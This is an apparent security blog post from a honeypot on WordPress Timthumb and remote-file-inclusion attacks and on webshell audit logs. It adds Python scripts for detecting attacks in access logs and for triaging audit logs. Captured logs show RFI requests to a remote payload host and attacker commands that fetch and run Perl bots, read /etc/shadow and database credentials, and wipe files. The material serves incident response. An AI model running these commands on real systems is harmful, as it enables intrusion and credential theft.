SpiderLabs Blog

[Honeypot Alert] Inside the Attacker's Toolbox: Webshell Usage Logging

In a previous blog post, we discussed the common lifecycle of web server botnet recruitment. While installing Perl IRC botnet scripts is a common post-exploitation tactic, it is by no means the only method used to interact with or control compromised websites. This blog post outlines how attackers use webshell/backdoor web pages, and the audit log file these webshells often leave behind.

Initial Compromise

The initial attack vector most often used is either Remote File Inclusion (RFI) or WordPress Timthumb plugin PHP Code Execution. Here are example attacks which were captured today in our web honeypots:

200.151.187.18 - - [19/Jun/2013:00:54:20 +0200] "GET /wp-content/themes/Apz.v1.0.2/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:03 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:12:43 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:06 +0200] "GET /wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:08 +0200] "GET /logs/wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:15:34 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:22:49 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:24:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:29:47 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:04:10:54 +0200] "GET /wp-content/themes/TheSource/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:03 +0200] "GET //wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:04 +0200] "GET /logs//wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:09:55 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:18:29 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:11 +0200] "GET //wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:12 +0200] "GET /logs//wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:25:15 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:32:33 +0200] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:33:48 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:41:43 +0200] "GET //wp-content/themes/yamidoo/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:42:34 +0900] "GET /wp-content/themes/ecobiz/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 243
200.151.187.18 - - [19/Jun/2013:08:58:39 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:01:47 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:20:11 +0200] "GET //wp-content/themes/EspOptimizePress/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:03:53 +0200] "GET //wp-content/themes/corporattica/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:14:38 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:20:37 +0200] "GET //wp-content/themes/digitalfarm/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:24:49 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:28:17 +0200] "GET //wp-content/themes/DelicateNews/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:28:51 +0200] "GET //wp-content/themes/kingsize/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:30:22 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:34:50 +0200] "GET //wp-content/themes/bigeasy/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:37 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:59 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:41:20 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:09 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:10 +0200] "GET /logs//wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:41 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:42 +0200] "GET /logs//wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:11:26:11 +0200] "GET //wp-content/themes/premiumnews/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:12:24:58 +0900] "GET //wp-content/themes/classifiedstheme/thumbs/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 249
200.151.187.18 - - [19/Jun/2013:14:20:43 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:14:26:34 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:15:33:15 +0900] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:16:02:13 +0900] "GET //wp-content/themes/MyResume/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:17:15:16 +0900] "GET //wp-content/themes/eVidTheme/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 247

In all of these examples, the attacker is attempting to trick the PHP application into downloading and executing the remote file hxxp://flickr.com.golfpops.com/thumbid.php. Note that the hostname only begins with "flickr.com"; the file is actually served from golfpops.com.
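Added here as an example (not code from the original post): a small Python scanner that applies the pattern above to Apache access-log lines. It flags requests that hand a remote src= URL to a theme or plugin thumbnail script, and separately calls out hosts such as flickr.com.golfpops.com that merely contain an allowed image host's name without being under it. The allow-list is an abbreviated assumption modelled on Timthumb's shipped defaults; all sample log lines except the first are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined or common log line; the honeypot excerpt above contains both.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Abbreviated version of Timthumb's default allowed-sites list (assumption).
ALLOWED_HOSTS = ("flickr.com", "picasa.com", "blogger.com", "wordpress.com",
                 "img.youtube.com", "upload.wikimedia.org", "photobucket.com")

def host_status(host):
    """'allowed' if host is an allowed site or a subdomain of one,
    'lookalike' if it merely contains an allowed name (flickr.com.golfpops.com),
    'other' otherwise."""
    host = host.lower()
    for allowed in ALLOWED_HOSTS:
        if host == allowed or host.endswith("." + allowed):
            return "allowed"
    for allowed in ALLOWED_HOSTS:
        if allowed in host:
            return "lookalike"
    return "other"

def analyse_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    # Only theme/plugin paths and the thumbnail scripts themselves are of interest.
    if not (path.endswith(("timthumb.php", "thumb.php"))
            or "/themes/" in path or "/plugins/" in path):
        return None
    src = parse_qs(parts.query).get("src", [None])[0]
    if not src:
        return None
    src_parts = urlsplit(src)
    if src_parts.scheme not in ("http", "https"):
        return None  # a local image path, not a remote fetch
    status = host_status(src_parts.hostname or "")
    if status == "allowed":
        return None  # legitimate remote thumbnail from a permitted image host
    reason = ("src host mimics a Timthumb-allowed image host" if status == "lookalike"
              else "remote src from a host outside the Timthumb allow-list")
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": parts.path,
            "src_host": src_parts.hostname, "http_status": int(m.group("status")),
            "reason": reason}

def scan(lines):
    """Findings plus, per source IP, the set of remote hosts it tried to load."""
    findings = [f for f in map(analyse_line, lines) if f]
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).add(f["src_host"])
    return findings, by_ip

# First line is copied from the honeypot excerpt above; the rest are constructed.
SAMPLE_LOG = [
    '200.151.187.18 - - [19/Jun/2013:00:54:20 +0200] "GET /wp-content/themes/Apz.v1.0.2/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"',
    '203.0.113.5 - - [19/Jun/2013:01:00:00 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://farm1.static.flickr.com/1/2.jpg&w=100 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Jun/2013:01:05:00 +0200] "GET /wp-content/plugins/foo/timthumb.php?src=http://cdn.example.net/a.php HTTP/1.1" 200 1234',
    '203.0.113.9 - - [19/Jun/2013:01:06:00 +0200] "GET /wp-content/themes/Apz/thumb.php?src=images/logo.png HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG)[0]:
        print(f["ip"], f["path"], f["src_host"], f["reason"])
```

A 404 (as in the honeypot lines) means the script was not present; a 200 on such a request is the case worth pulling the corresponding file system timeline for.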

Post-Compromise Actions

This webshell has functionality similar to the following redacted example -

[Screenshot: redacted example of the webshell interface]
This webshell provides extensive functionality for the attacker. In this screenshot, the attacker is using the "View File" component. The resulting URL looks like this:

http://VICTIM_SITE/wp-includes/theme-compat/wp-targz.php?x=f&f=wp-config.php&d=%2Fhome%2Ffoo%2Fpublic_html&cd=2&hl=en&ct=clnk&gl=us

The "f" parameter is the file that the attacker is viewing through this webshell. As you can see, the attacker is able to inspect the contents of wp-config.php, which disclose sensitive data such as the database username and password. This type of data leakage can lead to deeper compromise. Other examples of actions include:

[Screenshot: other actions offered by the webshell]

Attackers can even edit existing files to try to remove their tracks from logs. This screenshot shows an example of editing the Apache access_log file:

[Screenshot: the webshell's file editor open on the Apache access_log file]

Webshell Usage Logging

While reviewing these webshell files, we found that many include audit logging as part of the backdoor. For example, let's look at the source of that thumbid.php script again:

[Screenshot: the audit logging section of the thumbid.php source]
This section of PHP code creates an audit log file called "x.txt" in the document root directory of the website and logs every interaction a web client has with the webshell. Here are some examples that SpiderLabs has obtained which show past commands used.

Example 1:

Day  : Mon, 03 Jun 2013 22:05:39 -0300
IP  : 188.83.6.147
Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.php
Last Command : id
________________________________________
Day  : Mon, 03 Jun 2013 22:05:52 -0300
IP  : 188.83.6.147
Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.php
Last Command : wget http://mail.ebsuccess.com/accounts/inc/bot1.txt; perl bot1.txt; rm -rf bot1.txt
________________________________________

These entries show that the attacker first ran the "id" command to see which user the webshell was running as. She then downloaded a file, executed it, and removed the file to clean up.

Example 2:

Day     : Wed, 05 Jun 2013 19:36:43 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : edit_file
________________________________________
Day     : Wed, 05 Jun 2013 19:37:54 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
________________________________________
Day     : Wed, 05 Jun 2013 19:38:19 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : wget http://193.180.115.30/~online/php/c100.gif ; mv c100.gif fantastico.php ; chmod +x *.php ; ls -alF
________________________________________
Day     : Wed, 05 Jun 2013 19:40:18 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : cat .htaccess
________________________________________
Day     : Wed, 05 Jun 2013 19:40:47 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp* ; perl ftp
________________________________________
Day     : Wed, 05 Jun 2013 19:41:24 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : hostname ; /sbin/ifconfig | grep inet ; cat /etc/passwd /etc/shadow /root/.my.cnf /etc/group ; ls -alF /etc/passwd /etc/shadow /root/.my.cnf /etc/group
________________________________________
Day     : Wed, 05 Jun 2013 19:42:02 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : netstat -an | grep -i listen
________________________________________
Day     : Wed, 05 Jun 2013 19:46:06 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : rm -f ftp ftp.txt ; ls -al
________________________________________
Day     : Wed, 05 Jun 2013 19:47:16 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : cat /home/XXXX/public_html/blog/configuration.php
________________________________________
Day     : Wed, 05 Jun 2013 19:47:56 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : find `pwd` -type f -name \"*thumb*.php\" -exec ls -alF {} \\;
________________________________________
Day     : Wed, 05 Jun 2013 19:59:54 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp*
________________________________________
Day     : Wed, 05 Jun 2013 20:00:03 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : edit_file
________________________________________
Day     : Wed, 05 Jun 2013 20:00:56 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
________________________________________
Day     : Wed, 05 Jun 2013 20:01:05 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
________________________________________
Day     : Wed, 05 Jun 2013 20:03:29 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : edit_file
________________________________________
Day     : Wed, 05 Jun 2013 20:04:02 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
________________________________________
Day     : Wed, 05 Jun 2013 20:04:19 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
________________________________________
Day     : Wed, 05 Jun 2013 20:05:31 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
________________________________________
Day     : Wed, 05 Jun 2013 20:06:57 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
________________________________________
Day     : Wed, 05 Jun 2013 20:07:10 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
________________________________________
Day     : Wed, 05 Jun 2013 20:09:34 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
________________________________________
Day     : Wed, 05 Jun 2013 20:10:01 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
________________________________________
Day     : Wed, 05 Jun 2013 20:10:08 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
________________________________________
Day     : Wed, 05 Jun 2013 20:11:08 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
________________________________________
Day     : Wed, 05 Jun 2013 20:11:12 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
________________________________________
Day     : Wed, 05 Jun 2013 20:12:34 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
________________________________________
Day     : Wed, 05 Jun 2013 20:12:46 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
________________________________________
Day     : Wed, 05 Jun 2013 20:17:01 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
________________________________________
Day     : Wed, 05 Jun 2013 20:17:16 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
________________________________________
Day     : Thu, 06 Jun 2013 13:30:30 -0500
IP      : 109.167.225.109
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : rm -f ftp ftp.txt ; ls -alF
________________________________________
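Added here as an example (not code from the original post or from the webshell itself): a Python parser for the x.txt / logx.txt audit log format shown in Examples 1 and 2, which turns the Day / IP / Browser / Url / Last Command records into a sorted timeline, tags each command by what an incident responder would want to know (download-and-execute, credential file reads, cleanup, file edits, reconnaissance), and summarises activity per source IP. The tag patterns are my own assumption about what is worth triaging first; the sample input is reproduced from the post's Example 1 and Example 2 entries above.

```python
import re
from datetime import datetime

# Entries are separated by a run of underscores; fields may sit on separate lines
# or, as in the excerpt above, be run together on one line. The regex copes with both.
SEP_RE = re.compile(r"_{5,}")
ENTRY_RE = re.compile(
    r"Day\s*:\s*(?P<day>.*?)\s*IP\s*:\s*(?P<ip>\S+)\s*Browser\s*:\s*(?P<ua>.*?)\s*"
    r"Url\s*:\s*(?P<url>\S+)\s*Last\s+Command\s*:\s*(?P<cmd>.*)",
    re.S,
)

# Triage tags (assumption: my own choice of patterns, ordered by priority).
TAGS = [
    ("download_and_run", re.compile(r"\b(wget|curl|fetch)\b.*[;&|].*\b(perl|php|python|sh|bash)\b")),
    ("credential_read", re.compile(r"/etc/shadow|\.my\.cnf|wp-config\.php|configuration\.php|/etc/passwd")),
    ("cleanup", re.compile(r"\brm\s+-r?f\b")),
    ("file_edit", re.compile(r"^(edit_file|save_file)$")),
    ("recon", re.compile(r"^(id|hostname|netstat|ls|cat \.htaccess|/sbin/ifconfig|find|pwd|uname|whoami)\b")),
]

def classify(cmd):
    """All triage tags whose pattern matches the command, in TAGS order."""
    return [name for name, rx in TAGS if rx.search(cmd)]

def parse_entries(text):
    """Parse an x.txt-style audit log into a time-sorted list of dicts."""
    entries = []
    for chunk in SEP_RE.split(text):
        m = ENTRY_RE.search(chunk)
        if not m:
            continue
        when = datetime.strptime(m.group("day").strip(), "%a, %d %b %Y %H:%M:%S %z")
        cmd = m.group("cmd").strip()
        entries.append({"when": when, "ip": m.group("ip"), "ua": m.group("ua").strip(),
                        "url": m.group("url"), "cmd": cmd, "tags": classify(cmd)})
    entries.sort(key=lambda e: e["when"])
    return entries

def summarize(entries):
    """Per source IP: first/last seen, entry count, tag set, and commands to review first."""
    out = {}
    for e in entries:
        s = out.setdefault(e["ip"], {"first": e["when"], "last": e["when"],
                                     "count": 0, "tags": set(), "hot": []})
        s["first"], s["last"] = min(s["first"], e["when"]), max(s["last"], e["when"])
        s["count"] += 1
        s["tags"].update(e["tags"])
        if {"download_and_run", "credential_read"} & set(e["tags"]):
            s["hot"].append(e["cmd"])
    return out

# Sample input reproduced from the post's Example 1 and one Example 2 entry.
SAMPLE_XTXT = """Day  : Mon, 03 Jun 2013 22:05:39 -0300
IP  : 188.83.6.147
Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.php
Last Command : id
________________________________________
Day  : Mon, 03 Jun 2013 22:05:52 -0300
IP  : 188.83.6.147
Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.php
Last Command : wget http://mail.ebsuccess.com/accounts/inc/bot1.txt; perl bot1.txt; rm -rf bot1.txt
________________________________________
Day     : Wed, 05 Jun 2013 19:41:24 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : hostname ; /sbin/ifconfig | grep inet ; cat /etc/passwd /etc/shadow /root/.my.cnf /etc/group
________________________________________
"""

if __name__ == "__main__":
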